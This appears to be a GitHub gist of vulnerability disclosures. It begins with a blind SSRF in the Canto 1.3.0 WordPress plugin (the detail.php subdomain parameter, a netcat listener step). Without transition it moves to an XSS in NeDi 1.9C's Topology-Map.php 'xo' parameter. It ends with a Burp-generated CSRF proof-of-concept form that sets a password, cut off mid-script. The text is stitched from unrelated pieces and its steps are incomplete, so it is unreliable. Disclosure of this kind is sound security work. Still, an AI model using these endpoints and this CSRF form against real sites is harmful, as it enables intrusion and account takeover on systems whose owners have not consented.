Skip to content

Instantly share code, notes, and snippets.

@p4nk4jv
p4nk4jv / Wordpress Plugin Canto 1.3.0 - Blind SSRF Vulnerability
Created November 25, 2020 11:50
Wordpress Plugin Canto 1.3.0 - Blind SSRF Vulnerability
# Wordpress Plugin Canto 1.3.0 - Blind SSRF Vulnerability
## Multiple Server-Side Request Forgery Vulnerabilities found in Canto 1.3.0 version.
**Description:-**
The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerability.
It allows an unauthenticated attacker can make a request to any Internal and External Server via /includes/lib/detail.php?subdomain=SSRF.
**Steps To Reproduce:-**
1. Start a Netcat Listener on port 4499.
Multiple Cross-Site Script Vulnerabilities found in NeDi 1.9C version.
Description:-
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack.
The application allows an attacker to execute arbitrary JavaScript code via the "Topology-Map.php" page on "xo" parameter.
Steps To Reproduce:-
1. Login to the Application.
2. Go to "https://ip/Topology-Map.php" page.
3. Add 'xo' parameter at the end of the URL.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com" method="POST">
<input type="hidden" name="password" value="12345" />
<input type="hidden" name="confirm&#95password" value="12345" />
<input type="submit" value="Submit request" />
</form>
<script>